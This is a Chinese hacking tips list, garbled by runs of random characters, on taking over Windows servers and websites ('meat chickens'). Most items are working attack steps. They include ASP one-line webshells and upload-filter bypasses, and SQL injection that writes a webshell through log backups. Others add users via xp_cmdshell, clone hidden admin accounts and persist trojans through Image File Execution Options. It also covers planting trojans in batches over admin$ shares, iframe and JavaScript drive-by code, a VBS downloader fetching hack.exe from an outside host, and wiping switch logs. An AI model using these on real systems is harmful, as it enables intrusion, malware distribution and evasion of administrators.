Xp系统修改权限防止病毒或木马等破坏系统,cmd下,! q r% @4 ?/ Q1 r. ]1 Y
cacls C:\windows\system32 /G hqw20:R& c2 r$ }, @6 }5 G" I+ Y D/ O
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
3 t; e/ `5 E1 [- f f恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F8 A- W- }( r' b9 C6 E, F- s, O
6 D7 E% W8 \$ y8 x2 k8 H, W
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ H/ V* B: L1 ^' F+ U; \8 i0 W0 r/ ~, M# Z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
7 g1 i4 Q. k. S7 X1 A+ S$ P7 o- P8 d% |
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号1 N. N, f$ Z x* S! f. ~6 O0 v5 T# f
7 u# U% }9 M" Y! ]2 D! i, h* c4 d5、利用INF文件来修改注册表4 E: c9 S# d1 ]2 \' h E2 F' Z1 Q% P
[Version]" M: U6 \" D5 [2 Z5 | s
Signature="$CHICAGO$"
* J( [% J; V2 v% h q. s# j' b! o[Defaultinstall]6 s9 Z/ u& `9 ]8 E+ N& H) O% x
addREG=Ating: [7 z* {8 R5 I; D( T: @2 L B
[Ating]
* i6 z/ S" V% Z Y* J2 {HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"+ f, U; d% y2 W' b( k5 P
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
2 }* Q! ?# j c- F2 L0 }rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
& w2 u; I! r% f, e5 j/ I9 [: M其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU1 n) M. r! z5 P4 ]5 A
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 L" z! B/ H7 W/ |: b1 l. i
HKEY_CURRENT_CONFIG 简写为 HKCC
4 i# |6 _7 h( O% Y4 A) v0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
" D4 r( W" ^; D"1"这里代表是写入或删除注册表键值中的具体数据
( | E/ d/ H: k3 j6 R) f s) w: I7 Q0 ?. Z/ q
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
, G- B1 U1 z1 \! O) W& J多了一步就是在防火墙里添加个端口,然后导出其键值0 {' w; C6 W* N' J. W4 _9 ^
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]7 H8 H) P1 {/ [
% O: a2 J- n5 _ \( L( [7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
2 r |3 ]7 w- E! F# b在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。9 K! m8 ^' u8 T5 x
5 V: w# ~3 Q1 K- a5 I% V8 Y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。5 V# l; X! \% x; P6 o0 c# K
8 U- d. ], D" Q0 e$ M: U3 _+ w
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,9 j" t8 z* B% a! a4 P, c5 W: p
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。9 g3 ~! m7 B% O
8 T. g4 G/ U8 a8 H! v0 y
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”/ |: @ [( k7 y6 g
- a% [ Q' [9 D. V) ]
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) X: j3 D4 a m, i, L用法:xsniff –pass –hide –log pass.txt# z9 s1 q8 ]( ?% d' q
& W- o/ r0 M, c9 |/ P! i. {12、google搜索的艺术( { B* A( l, O$ V: s3 s1 m
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 I, h4 [" ?, |0 N M+ R" N- ~或“字符串的语法错误”可以找到很多sql注入漏洞。- A4 b/ F0 H* l- q9 V4 z2 ?6 |
- n: ~1 J) r( d. v4 F* m$ b# ~/ d) g
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
1 c$ Y/ ~; p) I& ^7 o) e& a P. ]+ W' F/ L' |
14、cmd中输入 nc –vv –l –p 1987
0 {% y* | ]. |9 z( A& x做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃' {- Q8 o0 d5 S! i8 `
) G) c+ g9 T, v. b
15、制作T++木马,先写个ating.hta文件,内容为
4 U( @0 O) m0 Y6 h& a$ i* ]0 A<script language="VBScript">, w2 `6 I8 W/ k1 j$ Q5 T% \5 ~
set wshshell=createobject ("wscript.shell" )
* O( }! Z& W' L5 y0 _a=wshshell.run("你马的名称",1)
- n& p4 |. l- T5 c. v$ Ewindow.close
3 V, E3 I* r6 ]9 O</script>
$ d7 ~3 M1 y, I3 i$ _; Q8 S) j再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。- z4 _% h8 h9 v3 x5 A
1 g- f+ d# u Z* |
16、搜索栏里输入1 j; @+ n3 H. s" s* M
关键字%'and 1=1 and '%'='0 W: M# Z. s: p) {
关键字%'and 1=2 and '%'='
7 S' H( t6 Y# z; V l比较不同处 可以作为注入的特征字符
# \9 ~/ Q3 n2 ]" m& T. ~: o- n( C0 W3 C9 @' V* _9 y2 o
17、挂马代码<html>
& {" A+ k1 P6 }9 p" K6 j3 W<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>; ^2 |2 p- L9 i9 M
</html>
3 A* b+ U' R+ j' V `' f4 c/ H9 _ L$ j9 `
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
2 Y4 |) B: f Y# L: D% \net localgroup administrators还是可以看出Guest是管理员来。
- [( ]& Z& ^; v- H8 l+ {- ~/ p
6 {" O, i0 h9 f- Z' s2 `19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- ]4 v B1 @5 Q) r! J% ?& S
用法: 安装: instsrv.exe 服务名称 路径
* F' {1 e0 Q( R! ]) P6 G; a' E z" Z- d卸载: instsrv.exe 服务名称 REMOVE
; W/ W, |/ o! @% M2 Z
7 T; S6 `( }1 j/ b1 F/ u. }
' x i1 |' Q( o21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
% l, j" o' R( q3 C- e. i6 f- F不能注入时要第一时间想到%5c暴库。
# n- L, v" k0 w& X
, ], J% \) M2 r: w9 ]22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. X/ o% m3 `, v/ a3 U0 i. \. R2 ^. w& ]; T
23、缺少xp_cmdshell时( Z( [" a# x% z, v# \
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, i2 V( O* x6 ` t0 M假如恢复不成功,可以尝试直接加用户(针对开3389的)
4 Q/ \9 Z% k/ x& R+ Gdeclare @o int
% n# o# Y- ^2 Rexec sp_oacreate 'wscript.shell',@o out _ e- ?3 z' [% M9 I; S
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员/ ]) Y- N# V- M
0 E" N" b7 D) R v
24.批量种植木马.bat
; w9 |, Y/ J9 m% n: n k1 Y6 @6 ufor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中- s0 l; F/ Y' D+ p) q8 b( \
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
7 S' U' v, [ S# T: o( m) U8 ~扫描地址.txt里每个主机名一行 用\\开头( C/ y0 R8 {' j. \* K5 Q9 p
; O$ {! y9 W, s, B" o" u
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
2 v; v( l- g4 n: g0 A: P# b& Z5 {. L1 [
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" a5 R& z+ q7 l9 O3 s将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
" S, p+ ~. R$ w2 h! b.cer 等后缀的文件夹下都可以运行任何后缀的asp木马+ t* [9 v% N, S% J
2 S9 _# Z1 n7 ^* o, f27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP4 m- d/ u5 A6 V7 C' P
然后用#clear logg和#clear line vty *删除日志
- Z! y u! t1 U( Y
) E- G; l# U# d' l. B( J$ @28、电脑坏了省去重新安装系统的方法
# S3 B4 M: D- ~纯dos下执行,) B7 V9 w2 F: K6 y7 F
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
7 k0 f" }3 n, I* {( G2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config( ^ \# t6 v6 Q
1 A- R! U2 [ V; M; f
29、解决TCP/IP筛选 在注册表里有三处,分别是:
+ Z, s/ @* L9 _/ N% MHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip$ J" o) C$ c# k& f# c* M
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! D/ m) k/ {& e. l V
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! \9 @/ X- z1 ^) h3 C: A
分别用! X a, W2 y. J# m0 O1 |+ Z6 @* ~/ |; U
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 Z% ?% E$ L* i: P& @- P: A5 sregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip9 Y+ z" @' T1 `7 |7 {$ M
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 A; V8 B- Z7 p# f1 C8 T命令来导出注册表项4 v2 D4 t" \) m% H
然后把三个文件里的EnableSecurityFilters"=dword:00000001,, S ], `1 ]# S2 |* [! G2 f/ O
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用7 z" D/ p1 k* `& m8 a" t
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 l/ B' w$ q* B1 a( ?
1 c! X0 y A* F" c8 k30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ `, L4 v$ k9 W+ f! a4 A: PSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3/ S* J5 a" l! N
" |3 j% I$ \* u/ C' q% z5 m31、全手工打造开3389工具
* I) I, A- J: L6 B& X0 V打开记事本,编辑内容如下:
- S2 p6 ^8 [. y5 }6 O" c6 {echo [Components] > c:\sql
0 z# c+ s' F5 s. g5 x# lecho TSEnable = on >> c:\sql
" Y$ z( Y1 j5 D4 |$ Z& ]sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
, _- K6 c% [$ _, V* Z" ~5 ~5 p编辑好后存为BAT文件,上传至肉鸡,执行+ g4 h7 L* b$ o% y+ M) s# k0 d2 v! y" J
6 r$ ? s' y7 y7 j! c1 |8 x2 p. T
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 Y2 n6 {: N0 X$ G
, Z3 ^3 c0 o% T. S: C @3 ]33、让服务器重启
+ {6 `, W6 l) x. t9 P' m写个bat死循环:: i; n3 _& n" n) h4 P
@echo off
. X) a3 D6 V! X:loop1( C8 W! x/ q3 A+ L3 t
cls
. ~! T: s; n! K0 Fstart cmd.exe
* w2 w f( N+ h; h/ Zgoto loop15 w* \" {( m9 e5 ^, s1 y7 U
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
+ ]5 s* P# q6 N6 k: R( {1 Q3 F! ^& u( v% ?/ E8 b6 q3 I6 V
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
' M6 ]/ v0 D! i1 x/ Q@echo off
& Z: R; x; J# Cdate /t >c:/3389.txt
: b, ?! ?1 L$ ^- itime /t >>c:/3389.txt
1 e; N, u6 `! O; s* ~9 \- M6 ]9 ]attrib +s +h c:/3389.bat9 R3 M/ `# X9 u
attrib +s +h c:/3389.txt9 j4 f( y5 B% i1 n3 o
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
6 B! e; {" |) S, Z+ t/ A( _! h: P并保存为3389.bat
% _1 C& R( g( m5 w. |6 Z打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
/ ^. \$ U' X1 B5 f( c9 I7 N: J8 D! t" E& w& A6 w
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
# ]# j5 H3 H& W* `* t; istart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
/ x# F% v* d, T n0 _; M7 A) q# Q$ l输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
+ p- _: N) y- \6 l6 G% e) a/ ^2 P6 `# r& z8 q5 Q
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
+ t% P+ L( l6 Y/ W, Vecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
* u9 `# C5 X, h2 decho 你的FTP账号 >>c:\1.bat //输入账号4 t$ C8 z# c" B& S
echo 你的FTP密码 >>c:\1.bat //输入密码
. k0 }4 j0 [( f9 t9 decho bin >>c:\1.bat //登入1 l) Z+ s6 {& U0 Q' `1 i
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
7 w. K: N2 n. m) t# L3 V! K" qecho bye >>c:\1.bat //退出7 R0 d/ W& ?$ u* k6 ?# P
然后执行ftp -s:c:\1.bat即可
% j2 z' g7 L' e7 v$ Y% [' K3 G5 U$ T7 i6 F$ l
37、修改注册表开3389两法
$ o& }) d0 K& J/ [/ A(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表5 p' K" M* v l" X, `/ W
echo Windows Registry Editor Version 5.00 >>3389.reg- `6 p+ D( Q4 `* |4 u( g
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
5 B* B, E9 `7 W9 H! H1 ]( Kecho "Enabled"="0" >>3389.reg2 Y! |" X. ]3 X* D+ E6 W4 s; ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows3 k1 F8 |$ c! {8 t* m
NT\CurrentVersion\Winlogon] >>3389.reg
& z, @4 w4 I* vecho "ShutdownWithoutLogon"="0" >>3389.reg5 b2 U# ~9 B' i0 s1 _- w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]* |3 ]% s; a% v# @
>>3389.reg
8 [8 i5 z: E# y B6 xecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg( T) f L" R* `- i8 Z, y5 }2 k3 g# `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
' z' u4 h6 H' H- I>>3389.reg# n; v( K. N; S3 g) ] p
echo "TSEnabled"=dword:00000001 >>3389.reg! B% q0 p6 k. _! O) j, y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
( S! ^, a8 V, hecho "Start"=dword:00000002 >>3389.reg
- ^* U/ `7 w8 \2 k$ Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
+ T. X4 i! |# j* ~# I% o>>3389.reg4 k- A- C( `+ |: `- ]4 l
echo "Start"=dword:00000002 >>3389.reg9 O; r9 A4 l$ o/ G
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
& o ]; i, ?3 Oecho "Hotkey"="1" >>3389.reg
9 [% |1 m1 \: P, Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; g2 D8 g$ z. R$ Y
Server\Wds\rdpwd\Tds\tcp] >>3389.reg+ w5 J) d# x- N6 h9 m! l9 G
echo "PortNumber"=dword:00000D3D >>3389.reg* J) \% r4 v4 V5 _' K, V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 T, W N& [% b! ]* c: t8 @
Server\WinStations\RDP-Tcp] >>3389.reg
' |5 r* d# t5 _echo "PortNumber"=dword:00000D3D >>3389.reg
7 o. e/ [- K6 X' u n. ~6 Q把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
P _( M F& l" B1 Q0 U(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
: h4 d3 H& P. {7 W: ]$ }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
/ f8 t* H' [' E3 L7 {" Q(2)winxp和win2003终端开启
" M1 E4 e G1 U5 U: U用以下ECHO代码写一个REG文件:/ y4 L: Z; F, J
echo Windows Registry Editor Version 5.00>>3389.reg: u$ @4 s+ {3 n3 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 a& E6 T" w) d$ V
Server]>>3389.reg
( z5 D- I0 B3 C; w `0 }echo "fDenyTSConnections"=dword:00000000>>3389.reg3 z9 R" m. {" s4 ~* [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 I. t0 b$ H8 cServer\Wds\rdpwd\Tds\tcp]>>3389.reg$ K- g/ t, e4 X' K( Q
echo "PortNumber"=dword:00000d3d>>3389.reg' ^8 G$ N( U; V0 U, {4 r; L' _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal s9 P' v! [" {5 t6 h0 A; n7 ^
Server\WinStations\RDP-Tcp]>>3389.reg
+ f4 d2 c4 Z# Xecho "PortNumber"=dword:00000d3d>>3389.reg6 M3 w$ _& V t/ t @
然后regedit /s 3389.reg del 3389.reg
1 i: N. O0 C9 C% n$ jXP下不论开终端还是改终端端口都不需重启
7 }, P+ F8 I' c. h. _ x) {! U: P9 M" a/ x0 `8 U
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃9 U* @+ r, d$ i, \+ z
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
2 J0 k! Z5 ?* l' M, U
, E" c% c" z6 U) A! W! E) z39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; q# K: q5 t8 E( a. I2 i- M3 h
(1)数据库文件名应复杂并要有特殊字符
, B, Y+ I9 c! {" a% b(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
" H# U, ~' _" K( k1 @1 M9 q+ k% z% S将conn.asp文档中的
$ l% T$ \9 P5 L6 ]/ KDBPath = Server.MapPath("数据库.mdb")4 V( j- X* _, c% W3 b
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ P+ Y: J+ c& v3 n) G/ {/ z& w7 s
5 v$ B1 o, `( G7 R" }4 J1 t y修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
) G2 l& F4 S5 o- O# g(3)不放在WEB目录里
+ a3 W8 ~& y9 I o* S& f- H
8 ~, O/ v# q8 M, G$ k40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
# t- n: Y. g0 q5 S可以写两个bat文件- W$ y; j. K3 Z! l# T
@echo off
+ t9 ^5 V) E" ^@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe) k* P. G8 j- \, p2 p( O3 o
@del c:\winnt\system32\query.exe9 ]7 X6 u$ D! M3 X
@del %SYSTEMROOT%\system32\dllcache\query.exe
: E! O) Y+ `! a& Z@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
, D& h! p: w8 h$ M) q
) ?6 V9 U5 y0 A$ e@echo off ^, Z6 _5 M( A P$ y) G' N
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe; `1 C& E, p% }; ?: @/ n; \ h+ I
@del c:\winnt\system32\tsadmin.exe
! t- m( }- N% E+ j- l@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex5 l6 Z5 V) M$ F* e7 V2 `/ _
% }" n: L. Z! s) v5 e9 e* I
41、映射对方盘符3 E, W; @2 p" m8 u, n" \/ k- d y
telnet到他的机器上," g f# J, k2 A( N
net share 查看有没有默认共享 如果没有,那么就接着运行7 O* [) F- e0 X3 N+ Y" l- e
net share c$=c:
9 L. A8 z B( s \. e$ ^4 Dnet share现在有c$, j, \, c9 l8 l" b
在自己的机器上运行
( k" l% p9 e& L( l1 Snet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
* {. y6 s0 O) B3 {' _ o9 B% A+ W. S2 a! o
42、一些很有用的老知识
5 k: g- ?! z- \9 U$ y% L. L* Htype c:\boot.ini ( 查看系统版本 )
' }6 b, k! `* A4 S& |net start (查看已经启动的服务)6 x2 D; H0 s. d+ r0 G9 U* h& F2 p
query user ( 查看当前终端连接 )
+ h" o8 j! g$ I- |0 Wnet user ( 查看当前用户 )7 S3 F$ A' l( D! g6 A1 D
net user 用户 密码/add ( 建立账号 )
1 \; o/ a5 Y0 x" \2 K5 rnet localgroup administrators 用户 /add (提升某用户为管理员)
& c9 H; V5 _/ T% @9 B; S9 |- n' Bipconfig -all ( 查看IP什么的 )( E# F* J0 K# R0 k' K' Z
netstat -an ( 查看当前网络状态 )# L' J- {; f3 [4 i, Y" l3 a
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
( U! ?! u9 l b; h! _克隆时Administrator对应1F44 T( W; ?) k: C9 w
guest对应1F5) t2 F9 s" A- \( | t& C7 E; H
tsinternetuser对应3E8, M% f8 a0 A4 V. q7 x9 j5 v
! D7 X0 P+ ~8 a7 R, G1 J/ T- n
43、如果对方没开3389,但是装了Remote Administrator Service* Y3 a" {- \) I+ _0 a
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接3 y8 \! @1 G: p( q- g
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息- A/ ^& D* N4 I( R" s. d
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"# h. L! l5 Q) ^. l& S1 B, c" }4 J: K
' q5 Z3 T. v+ M$ W0 ?- j% d44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) I% `, O/ P* f- _本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
8 Y, L3 e& ^4 X3 Q# P# y7 E0 z1 }8 p! |
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
# g# B( |' R& F0 E. s3 H+ s- decho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
" S# c1 a( T- h, E# t1 Y^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =2 x8 q b9 z2 e! O
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
8 \ b: b5 D& [4 M) N& _: w; k* J/ H1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
& p/ p4 b, U, w. G; ~(这是完整的一句话,其中没有换行符)
' r F- ` j$ r2 }: ~9 g P4 O然后下载:
$ b+ u& c; p/ @* ~6 C+ ]cscript down.vbs http://www.hack520.org/hack.exe hack.exe
- @! H' V: v8 r4 s) p" B6 Y' p1 L6 `0 {! }# L0 t- A0 D- Q
46、一句话木马成功依赖于两个条件:
: p7 a6 p/ d' v2 T( g+ ?1、服务端没有禁止adodb.Stream或FSO组件) _0 Z- o$ \0 D+ }8 a6 N
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。& C* f2 Z4 {4 ?' ~
" T3 X0 R: l3 S1 u; U47、利用DB_OWNER权限进行手工备份一句话木马的代码:
( t- U; V6 P! C% o& y) I2 F;alter database utsz set RECOVERY FULL--
: a! P' m/ k0 U8 _6 I;create table cmd (a image)--
; X$ x# J4 A4 F; V;backup log utsz to disk = 'D:\cmd' with init--
7 a9 l/ z8 L }& w, V0 e; y;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. ^0 x! V1 C+ R8 e" N6 n
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, u2 n; H3 Q, k7 S4 `/ c
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( B; e0 O8 e5 F+ z4 q) T* i. r
1 C; v- i% ]/ J2 |8 ^+ B+ R
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) {! G7 m$ L* j' u; D3 _+ k) d! U9 V u/ h2 x
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) @+ G" O/ z# O所有会话用 'all'。
0 Y; Z. { M* h) E% i& ]8 E+ g w-s sessionid 列出会话的信息。* b5 v$ N0 ^# @7 W" b3 ~, n
-k sessionid 终止会话。- v1 q9 ? h( t* h$ E$ i! b
-m sessionid 发送消息到会话。
2 M: y' l) [, g+ S+ q( K0 O
9 ?0 @! `5 q1 kconfig 配置 telnet 服务器参数。
8 W+ W1 z4 X [0 t8 R
9 J! [, F. x$ j) R5 g2 u' @common_options 为:! \1 A# Y/ }) i
-u user 指定要使用其凭据的用户
) {( l8 E, p) R; B-p password 用户密码) Y& ]$ y0 X x: \9 @! _
0 W) _& N* N& {! Y5 d1 ]/ G
config_options 为:1 t+ R0 d* J3 R) s4 Y) q- c/ d
dom = domain 设定用户的默认域# Z' v/ t w2 O7 I% A7 k
ctrlakeymap = yes|no 设定 ALT 键的映射
1 e7 C: @/ F+ V7 P; Htimeout = hh:mm:ss 设定空闲会话超时值! u6 Y$ f8 r3 W; y$ \) A
timeoutactive = yes|no 启用空闲会话。! [# l) V5 R6 I6 i0 p
maxfail = attempts 设定断开前失败的登录企图数。
7 P4 K. }# H$ J J4 e. }maxconn = connections 设定最大连接数。
+ j4 b* j9 v+ R$ S4 t* ~' pport = number 设定 telnet 端口。
9 l2 q2 p- Z; Tsec = [+/-]NTLM [+/-]passwd
: X @" h0 S2 p( n设定身份验证机构
1 \2 Z- Y' ?9 [8 Ufname = file 指定审计文件名。
: [( U! j+ @: _fsize = size 指定审计文件的最大尺寸(MB)。
8 E" Z' E2 i& B) \% Umode = console|stream 指定操作模式。: r3 V$ U: ~: `- W/ I* D
auditlocation = eventlog|file|both+ U# f/ F4 z! ~& }6 ~3 \
指定记录地点
% L# K$ _9 V6 x/ E7 F7 A5 caudit = [+/-]user [+/-]fail [+/-]admin
6 R9 N7 w7 e7 d( |6 D. i" e2 C6 X$ p; D9 K
49、例如:在IE上访问: m6 F" {4 S3 l; I' i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/( p9 S3 O5 `+ A0 {9 _4 N9 z8 {2 H
hack.txt里面的代码是:
! g- t1 h% h. l9 E9 T% ~<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, X9 {- j. p; G: _把这个hack.txt发到你空间就可以了!
7 W: @3 r5 Q3 K这个可以利用来做网马哦!
3 ~. c. W8 U$ }( G, ]7 M
- U3 _; o6 q3 i: S6 Z, ?% J" x: I50、autorun的病毒可以通过手动限制!8 T+ O2 V, D) n% K
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!$ v8 v$ N* {) J4 D; J6 `
2,打开盘符用右键打开!切忌双击盘符~
. `) i+ |! o0 V8 {0 D" e( q3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
! }6 f+ ?) n& o8 a: P* M! X7 w: R8 L$ G; N. s4 ~
51、log备份时的一句话木马:
2 ^' e- O( D- V0 ]% h Na).<%%25Execute(request("go"))%%25>
' r! B; C E2 Z6 g& W2 g6 h Zb).<%Execute(request("go"))%>
1 K# @5 d' B$ I+ ]% \4 oc).%><%execute request("go")%><%
1 M+ @$ a4 {9 g5 x9 \d).<script language=VBScript runat=server>execute request("sb")</Script>
2 T- n- i( q: f. R, g' M1 pe).<%25Execute(request("l"))%25>0 w* n; |- S: r
f).<%if request("cmd")<>"" then execute request("pass")%>
0 s0 X# b/ u" A0 O6 B/ {8 }: o6 c' ]. I I7 Y& a+ R( I
52、at "12:17" /interactive cmd
; Y2 C& R8 g! q$ `( v* O执行后可以用AT命令查看新加的任务
